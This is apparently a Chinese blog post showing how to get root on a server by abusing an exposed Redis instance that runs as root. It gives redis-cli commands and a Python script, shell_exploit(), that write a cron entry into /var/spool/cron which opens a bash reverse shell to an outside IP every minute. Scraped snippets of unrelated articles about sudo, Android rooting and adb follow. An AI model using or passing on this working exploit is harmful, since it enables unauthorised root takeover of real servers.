redis写定时任务获取root权限

前提:

1.redis由root用户启动。

2.开启cron的时候,/var/spool/cron linux机器下默认的计划任务,linux会定时去执行里面的任务。

启动服务 :/sbin/service crond start 或 /etc/init.d/crond start(centos系列)    sudo /etc/init.d/cron start (ubuntu系列)

一.windows下

config set dir /var/spool/cron
config set dbfilename root
set 1 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"
save

二.linux下

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"|redis-cli -h 192.168.118.129 -x set 1
redis-cli -h 192.168.118.129 config set dir /var/spool/cron/
redis-cli -h 192.168.118.129 config set dbfilename root
redis-cli -h 192.168.118.129 save

三.再贴一段python代码

import redis
def shell_exploit():
    try:
        r =redis.StrictRedis(host=‘192.168.118.129‘,port=6379,db=0,socket_timeout=10)
        r.set(1, ‘\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/your_ip/3333 0>&1\n\n‘)
        r.config_set(‘dir‘,‘/var/spool/cron‘)
        r.config_set(‘dbfilename‘,‘root‘)
        r.save()
        print "success!"
    except:
        print "fail!"
        pass
shell_exploit()

反弹成功,root权限!

时间: 2024-08-26 04:20:06

redis写定时任务获取root权限的相关文章

Debian普通用户获取root权限|sudo的安装与配置

Debian系统的普通用户需要安装软件时,往往会收到“Permission denied”的提示,这时候需要root权限.那么如何在不登陆超级管理员账户的前提下拥有root权限呢?对于大多数Linux系统来说,我们可以通过“sudo”命令来获取root权限,或者通过“su”登陆超级管理员账户来进行各种需要root权限的操作. 然而,Debian系统好像默认不安装sudo,所以下面将讲解“如何安装sudo及配置其sudoers文件” 首先登陆超级管理员账户,在 Terminal 命令行内输入 su

android中获取root权限的方法以及原理(转)

一. 概述 本文介绍了android中获取root权限的方法以及原理,让大家对android 玩家中常说的“越狱”有一个更深层次的认识. 二. Root 的介绍 1. Root 的目的 可以让我们拥有掌控手机系统的权限,比如删除一些system/app下面的无用软件,更换开关机铃声和动画,拦截状态栏弹出的广告等. 2. Root的原理介绍 谷歌的android系统管理员用户就叫做root,该帐户拥有整个系统至高无上的权利,它可以访问和修改你手机几乎所有的文件,只有root才具备最高级别的管理权限

centos7 新建用户并获取root权限

centos7 新建用户并获取root权限 原创 2016年10月26日 21:30:29 5929 0 11 1: 添加用户 # useradd name //name为添加用户名字 1 # passwd password //password为密码 1 输入密码后确认 passwd: all authentication tokens updated successfully 2:获取root权限 方法1): # vi /etc/sudoers 1 找到如下行  更改为  之后 # user

获取root权限及破解原理分析

2012-03-18 17:58:45|  分类: android |字号 订阅 如今Android系统的root破解基本上成为大家的必备技能!网上也有非常多中一键破解的软件,使root破解越来越easy.可是你思考过root破解的原理吗?root破解的本质是什么呢?难道是利用了Linux kernal的漏洞吗?本文将简单对root的破解原理进行分析. 网上非常多root教程所使用的都是rageagainstthecage程序,今天下载了rageagainstthecage.c源程序看了一下,大

三星Galaxy s4(i9505)完美获取root权限教程

三星Galaxy s4(i9505)完美获取root权限教程 论坛上贴吧上关于三星s4 i9505 root的介绍有很多,方法多种多样,今天小编来介绍一种使用root软件来实现三星i9505一键root的方法.这篇三星Galaxy s4(i9505)获取root教程仅仅三个步骤,借助完美ROOT工具来完成全部操作,方便快捷,废话不多说,请看i9505 root教程内容! 三星s4 i9505 root操作从准备工作开始,首先点击下载完美ROOT安装软件,其次检查手机保持开机,电量充足在50%以上

Genymotion刷入谷歌应用市场以及获取root权限

Genymotion刷入谷歌应用市场以及获取root权限 - 推酷http://www.tuicool.com/articles/rEV3aa6 刷入gapp, arm框架,supersu的包要注意,这些包所在的路径不能含有中文!!! 另外必须刷对的包 教程(包括我之前翻译的一篇 Genymotion简单教程及问题解决 ),但是大多数都已经没法用了.根据那些教程安装上的google play store,经常会弹出“已停止服务”的窗口. 其实最关键的点是,要刷对google apps packa

应用获取root权限分析及总结

ROM授权root权限,主要技术点在哪里?如何实现?带着这些问题,边实验边分析,并将过程和犯的错误记录如下. 1.rom支持root授权,需要包含su 简单点说,就是rom中支持su指令:必须包含su可执行程序,对应的代码/system/su目录下代码: 编译生成su程序后,再将其push到/system/xbin目录下:注意:此时需要修改该文件的执行权限, chmod 755 su 2.应用程序如何获取root权限? 关键点在于下面这句,通过执行su产生一个具有root权限的进程:Proces

NDK/Jni底层获取root权限的四种思路

很多时候对Android系统底层进行操作(如查看/data/data/下的数据)是没有权限的.当然如果能在Java层直接执行的操作,直接用类似如下代码执行即可: Process process; String cmd = "...."; try { process = Runtime.getRuntime().exec("su"); BufferedReader reader = new BufferedReader(new InputStreamReader( p

adb 获取root权限----adb命令集合

一.获取root权限,给文件以读写权限 步骤:1.手机进行root: 2.cmd 进入命令行 运行 adb shell命令(adb 已配置到环境变量中),此时命令变成$开头: 3.运行 su 命令,切换到root权限,此时命令变成#开头: 4.运行 chmod  777命令,后边跟文件路径,给文件读写权限. 二.其他常用命令 1.adb ll .adb ls -l列表显示文件目录 2.adb devices 显示连接的设备 3.adb logcat 显示日志 4.adb install *.ap